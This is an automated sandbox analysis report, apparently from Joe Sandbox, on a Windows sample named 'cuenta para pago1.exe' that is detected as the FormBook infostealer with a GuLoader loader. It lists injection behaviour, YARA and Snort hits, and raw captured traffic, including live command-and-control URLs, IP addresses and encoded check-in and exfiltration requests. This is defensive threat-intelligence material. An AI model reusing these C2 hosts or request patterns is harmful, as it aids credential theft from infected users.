Windows Analysis Report
cuenta para pago1.exe

Overview

General Information

Sample name:cuenta para pago1.exe
Analysis ID:1410998
MD5:93d1942c204022e792af256d0ccbe8e5
SHA1:76649fb41dc760d4c9ad8be23e239fcb7b0e2418
SHA256:c44904bfb8b44d8071f33359f824028597145f76bd1a6baf86d91679215e3c7d
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
Yara detected GuLoader
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • cuenta para pago1.exe (PID: 8380 cmdline: C:\Users\user\Desktop\cuenta para pago1.exe MD5: 93D1942C204022E792AF256D0CCBE8E5)
    • cuenta para pago1.exe (PID: 8924 cmdline: C:\Users\user\Desktop\cuenta para pago1.exe MD5: 93D1942C204022E792AF256D0CCBE8E5)
      • YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe (PID: 7188 cmdline: "C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • rasautou.exe (PID: 9124 cmdline: C:\Windows\SysWOW64\rasautou.exe MD5: DFDBEDC2ED47CBABC13CCC64E97868F3)
          • YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe (PID: 6944 cmdline: "C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7172 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: D1CC73370B9EF7D74E6D9FD9248CD687)
  • cleanup
No configs have been found
Source: 00000004.00000002.8749789268.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp
Rule: JoeSecurity_FormBook_1
Description: Yara detected FormBook
Author: Joe Security

Source: 00000004.00000002.8749789268.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp
Rule: Windows_Trojan_Formbook_1112e116
Description: unknown
Author: unknown
Strings:
  • 0x2b2a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x152ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Source: 00000004.00000002.8752868489.0000000004E10000.00000004.00000800.00020000.00000000.sdmp
Rule: JoeSecurity_FormBook_1
Description: Yara detected FormBook
Author: Joe Security

Source: 00000004.00000002.8752868489.0000000004E10000.00000004.00000800.00020000.00000000.sdmp
Rule: Windows_Trojan_Formbook_1112e116
Description: unknown
Author: unknown
Strings:
  • 0x2b2a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x152ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Source: 00000002.00000002.4215364100.0000000034570000.00000040.10000000.00040000.00000000.sdmp
Rule: JoeSecurity_FormBook_1
Description: Yara detected FormBook
Author: Joe Security
        No Sigma rule has matched
        Timestamp:03/18/24-15:09:57.009167
        SID:2855465
        Source Port:49831
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:09:16.037503
        SID:2855464
        Source Port:49821
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:09:48.984802
        SID:2855464
        Source Port:49828
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:10:24.436082
        SID:2855465
        Source Port:49839
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:08:35.249447
        SID:2855465
        Source Port:49810
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:10:34.275185
        SID:2855464
        Source Port:49840
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:10:42.848280
        SID:2855465
        Source Port:49843
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:10:10.841501
        SID:2855465
        Source Port:49835
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:09:01.994524
        SID:2855464
        Source Port:49817
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:10:16.329777
        SID:2855464
        Source Port:49836
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:10:02.687062
        SID:2855464
        Source Port:49832
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:08:59.288155
        SID:2855464
        Source Port:49816
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:09:07.414070
        SID:2855465
        Source Port:49819
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:10:56.860553
        SID:2855465
        Source Port:49847
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:10:48.749151
        SID:2855464
        Source Port:49844
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:14:44.917245
        SID:2855464
        Source Port:49852
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:09:43.418492
        SID:2855465
        Source Port:49827
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:09:35.300715
        SID:2855464
        Source Port:49824
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:08:45.740181
        SID:2855464
        Source Port:49811
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:09:51.666556
        SID:2855464
        Source Port:49829
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:10:51.453597
        SID:2855464
        Source Port:49845
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:09:21.447672
        SID:2855465
        Source Port:49823
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:08:53.774164
        SID:2855465
        Source Port:49815
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:10:05.405243
        SID:2855464
        Source Port:49833
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:10:37.130935
        SID:2855464
        Source Port:49841
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:08:48.415608
        SID:2855464
        Source Port:49812
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:09:38.013422
        SID:2855464
        Source Port:49825
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:09:13.346460
        SID:2855464
        Source Port:49820
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/18/24-15:10:19.031210
        SID:2855464
        Source Port:49837
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        AV Detection

        Source: cuenta para pago1.exe, Avira: detected
        Source: http://www.dreadbed.com/v3ka/, Avira URL Cloud: Label: malware
        Source: http://www.mvmusicfactory.org/v3ka/, Avira URL Cloud: Label: malware
        Source: http://www.stellerechoes.xyz/v3ka/?c4qx7JIP=GFfLE978cTjgJhl6jgUZbEhmCeB5iD6iCpjaC2ljIm715WZCCh3yMSG+VpY2eWrvhd9eQ+mGyZHjkiS2WPxVQ0dW/wG4u7YMAwOv3hEtYSzM6b6AuWOV5s4=&K4W=bb2HuFjPIN, Avira URL Cloud: Label: malware
        Source: http://www.stellerechoes.xyz/v3ka/, Avira URL Cloud: Label: malware
        Source: http://www.mvmusicfactory.org/v3ka/?c4qx7JIP=svB+aVl3D/Qs3yYm3uEZx4nnJil+hT1lh9v7sh/m91IvNeiskalMkbjGhLmhKb4ZrcP91hx+1jPTfxZ9U4bWGVnRMNWmuwE3Nqa36DGpX5UBaKLpwaX6qds=&K4W=bb2HuFjPIN, Avira URL Cloud: Label: malware
        Source: cuenta para pago1.exe, ReversingLabs: Detection: 47%
        Source: Yara matchFile source: 00000004.00000002.8749789268.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.8752868489.0000000004E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.4215364100.0000000034570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.8752999026.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.8751671842.00000000015C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.4216278898.0000000034BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.8751957709.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: cuenta para pago1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 142.250.65.174:443 -> 192.168.11.30:49803 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.41.1:443 -> 192.168.11.30:49804 version: TLS 1.2
        Source: cuenta para pago1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: mshtml.pdb source: cuenta para pago1.exe, 00000002.00000001.3959353601.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: wntdll.pdbUGP source: cuenta para pago1.exe, 00000002.00000003.4095218580.000000003453C000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4099312779.00000000346E3000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: cuenta para pago1.exe, cuenta para pago1.exe, 00000002.00000003.4095218580.000000003453C000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4099312779.00000000346E3000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: cuenta para pago1.exe, 00000002.00000001.3959353601.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: rasautou.pdbGCTL source: cuenta para pago1.exe, 00000002.00000002.4199073124.00000000046A1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: rasautou.pdb source: cuenta para pago1.exe, 00000002.00000002.4199073124.00000000046A1000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 0_2_0040635D FindFirstFileW,FindClose,0_2_0040635D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 0_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040580B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB

        Networking

        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49810 -> 172.67.130.3:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49811 -> 82.180.172.14:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49812 -> 82.180.172.14:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49815 -> 82.180.172.14:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49816 -> 198.54.117.242:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49817 -> 198.54.117.242:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49819 -> 198.54.117.242:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49820 -> 198.177.123.106:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49821 -> 198.177.123.106:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49823 -> 198.177.123.106:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49824 -> 194.191.24.38:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49825 -> 194.191.24.38:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49827 -> 194.191.24.38:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49828 -> 84.32.84.32:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49829 -> 84.32.84.32:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49831 -> 84.32.84.32:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49832 -> 62.149.128.45:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49833 -> 62.149.128.45:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49835 -> 62.149.128.45:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49836 -> 91.195.240.19:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49837 -> 91.195.240.19:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49839 -> 91.195.240.19:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49840 -> 103.146.179.172:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49841 -> 103.146.179.172:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49843 -> 103.146.179.172:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49844 -> 109.234.166.81:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49845 -> 109.234.166.81:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49847 -> 109.234.166.81:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49852 -> 172.67.130.3:80
        Source: DNS query: www.stellerechoes.xyz
        Source: Joe Sandbox ViewIP Address: 194.191.24.38 194.191.24.38
        Source: Joe Sandbox ViewIP Address: 84.32.84.32 84.32.84.32
        Source: Joe Sandbox ViewASN Name: GREENgreenchAGAutonomousSystemEU GREENgreenchAGAutonomousSystemEU
        Source: Joe Sandbox ViewASN Name: NTT-LT-ASLT NTT-LT-ASLT
        Source: Joe Sandbox ViewASN Name: HIITL-AS-APHongKongFireLineNetworkLTDHK HIITL-AS-APHongKongFireLineNetworkLTDHK
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TDplZO5f2MIfee6mC03XCNbyFO9KMFyd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1TDplZO5f2MIfee6mC03XCNbyFO9KMFyd&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /v3ka/?c4qx7JIP=5DSEd0ATp85KgzdrFCdxbLJep/S6iKShPg/Ik1pbcxCGQNrpEtjfCeVcF04T3qlunhYKINQJ6NoaGwxZUUZob6VNNlK6Td1e1fYChuA8Yf+ZyRKX9C6Zn4U=&K4W=bb2HuFjPIN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.wbyzm5.buzzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
        Source: global trafficHTTP traffic detected: GET /v3ka/?c4qx7JIP=dNjCJvlouN0lJiHjmW6o9laKqXafrGVThPe+fRU03jlQNeIZZXj0HZnF0wYmB7+6kDtWMlD6FZc6rz3hPOSCoZPNCiuZ/LMstJjl/Jmg62t+iuZuHiG5vvg=&K4W=bb2HuFjPIN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.xiefly.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
        Source: global trafficHTTP traffic detected: GET /v3ka/?c4qx7JIP=6uRTEcONOSwyaRtl3SIdI/7ZcaxdnFD0iGrt2seiEdMiqBKCwYyYvMrO5fxXMQNYUGElLXPpIQYaUrVgpe2t46086L+DcudheMq8m5F90vo+8IbH2nL0hLQ=&K4W=bb2HuFjPIN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.dreadbed.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
        Source: global trafficHTTP traffic detected: GET /v3ka/?c4qx7JIP=GFfLE978cTjgJhl6jgUZbEhmCeB5iD6iCpjaC2ljIm715WZCCh3yMSG+VpY2eWrvhd9eQ+mGyZHjkiS2WPxVQ0dW/wG4u7YMAwOv3hEtYSzM6b6AuWOV5s4=&K4W=bb2HuFjPIN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.stellerechoes.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
        Source: global trafficHTTP traffic detected: GET /v3ka/?c4qx7JIP=bbTJsjbns1egJ9JPkt58MNAjZkRhgchDkV02q5vokHm6S8Qgk9c4A4/rVALt8kpaWPL/RyZRbRAxNoIAik6Ahn7XchDP755TKRWw96XVZ2F1n8YO16SVy/I=&K4W=bb2HuFjPIN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.b-r-consulting.chConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
        Source: global trafficHTTP traffic detected: GET /v3ka/?c4qx7JIP=si7FLVHJ8iWuYVaGSkvjNM53tbCy++USJ5em8DLLO2leI9d5bok8bcXzE4IwU2K08OGpdZcld0QPM+bL/KkbuGKMc/2hsM2YOWzLfNROmTcvWRWJJAUk/s4=&K4W=bb2HuFjPIN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.teenpattimasterapp.orgConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
        Source: global trafficHTTP traffic detected: GET /v3ka/?c4qx7JIP=J4AzjciiJVojUGFuzrYbXLmTAhGMI5W/z8Zu4GWgm/9FzWPCzEiuTS1rwMX9pE5r2vC14B8Wx1zW9w/trsCTKSg2AEld6ylXwESzvlSrq/FwhsHRtw64/YA=&K4W=bb2HuFjPIN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.clarycyber.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
        Source: global trafficHTTP traffic detected: GET /v3ka/?c4qx7JIP=svB+aVl3D/Qs3yYm3uEZx4nnJil+hT1lh9v7sh/m91IvNeiskalMkbjGhLmhKb4ZrcP91hx+1jPTfxZ9U4bWGVnRMNWmuwE3Nqa36DGpX5UBaKLpwaX6qds=&K4W=bb2HuFjPIN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.mvmusicfactory.orgConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
        Source: global trafficHTTP traffic detected: GET /v3ka/?c4qx7JIP=TQDhdygg/6k1FrT3duJj1OYD3+fr21m2MLjtTeKUejKDGRun2D/B3i3kqoFCSoO3Pw/E65XWfWwoO6YHx8j54r/FSG1v4bIQ+pjQtA18fUYdL5hShFxGKN0=&K4W=bb2HuFjPIN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.kmyangjia.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
        Source: global trafficHTTP traffic detected: GET /v3ka/?c4qx7JIP=FpC4ctUTedBaFzLAmx5OBNlXlmn8zXWsfuWaCxk5g1trlxnFx7v6dtr2+OePcWisPCE1uISKUROI1tM11v9REV8vlVyrWAjZBU/BkE4yHxOZw90SexyJFP0=&K4W=bb2HuFjPIN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.globalworld-travel.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
        Source: unknownDNS traffic detected: queries for: drive.google.com
        Source: unknownHTTP traffic detected: POST /v3ka/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enHost: www.xiefly.shopOrigin: http://www.xiefly.shopContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 205Cache-Control: max-age=0Referer: http://www.xiefly.shop/v3ka/User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0Data Ascii: c4qx7JIP=QPLiKYhL3NQ0IQXmhCuG8kP87wSxrG5QjbSaRn587E1XPMckan7MFObs3HVsPbuRoi1fGXXhFKU39TqGPu2Pr6KYF0TciKE01pTyh/GjjSVdntlQPGeegcRFsQJKIVpISZH/ApRNnfSmdT4hCsocuDIwCbVZ1gILqD/YSqCZzzOVsiwcx7ir0g1A0NVbBH+MVA==
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmllast-modified: Thu, 23 Jun 2022 13:08:36 GMTetag: "999-62b465d4-7483b18151e2685e;br"accept-ranges: bytescontent-encoding: brvary: Accept-Encodingcontent-length: 912date: Mon, 18 Mar 2024 14:08:45 GMTserver: LiteSpeedplatform: hostingerData Raw: 02 33 01 80 1c cb 59 ff 7c 5e d3 7a f6 90 9a d1 13 d5 89 13 81 1c c3 8a f9 f1 73 6a 9b 08 2b df dd 4f 0a 44 aa 73 c4 1f 32 66 47 20 dc 5c e5 88 9c 27 a1 a6 43 5c 9d 2b a5 4a c8 4b 27 5e 48 40 fa 18 94 1a 0a 69 bc ea a6 86 9f 52 17 4a 69 8d ea 0e fc 3d b3 03 04 6f b5 a7 ae ae 84 71 8e 48 4e c5 44 c6 95 21 29 7c 8c 84 24 0e 50 4a 62 99 b8 21 12 32 8b 99 4c cf 45 53 1b 2a 49 7c 35 45 4e c4 54 82 cd 4f cf d9 bc 15 4d 2a 0d f5 c0 25 19 9d d1 68 52 e7 73 e5 40 83 71 72 32 95 2e c9 78 53 be d0 03 d2 36 19 08 4c 4b 7c 43 ea f0 66 29 5e 86 ba 00 e1 b8 a5 ca c6 e8 5b 24 67 f2 16 94 0d ed 26 3d b8 a0 44 ba df 54 7e 7b fd ea 63 ba aa dd 63 60 ce 9b 02 54 94 a8 f3 0d f8 a7 96 6d aa 30 b6 2f a1 cb 43 a5 d2 f7 78 88 dc 0b 98 86 ee 36 b6 ff f6 5b 3f 4d fe 6b 17 d7 16 ab df ec 8b 85 f9 86 40 cf f8 e5 a2 17 87 a8 d8 c9 1b 49 58 b3 99 5c e8 24 dd 19 eb c7 1f 44 b8 69 d6 42 b8 3e e3 41 34 ea d4 0e ba 26 29 4d da bd e5 6e 83 b7 c8 1c 41 ba 17 3d 64 32 e6 d0 48 8a 48 c5 91 9c 0a ad 45 b6 a7 30 d8 b0 57 4d 47 c5 85 75 2b c3 90 37 e6 40 5f 21 59 07 96 73 0e 13 a3 eb a9 9d 18 0d 9a 8f c5 e7 8f 15 2a ce eb 86 66 2c 74 40 5c 0e c0 a3 87 99 a7 20 21 c3 00 88 18 78 b3 6a aa 8c 31 65 c8 5b db 12 03 08 09 02 ba 49 23 12 d4 47 ea 01 5f 58 0d b0 2f 47 80 7e 97 5b cc 53 18 9d 76 9b bc 00 3f 47 90 29 70 cc 07 24 4b 3e 32 2a d2 75 a9 d6 a6 02 08 d5 03 9f e0 04 7d 0b 9f d8 98 fe 22 22 17 ee 1c 61 21 ac ca 4b 70 14 3c 18 43 ef 06 2f e2 c4 08 97 df 21 ef b0 fd 00 80 e5 7e d8 4b ce c5 5c ac 0d 4f ba 1f 2d 1a 6d 22 d3 e8 ee 97 59 e3 49 78 cd 32 b6 1a 05 e1 79 18 c6 bb a9 b7 6d 6a ee 7c 44 43 3b 3f d9 99 4f 26 9a 79 e1 e0 e2 8d b5 b2 57 d6 da 5e 5b 1b 
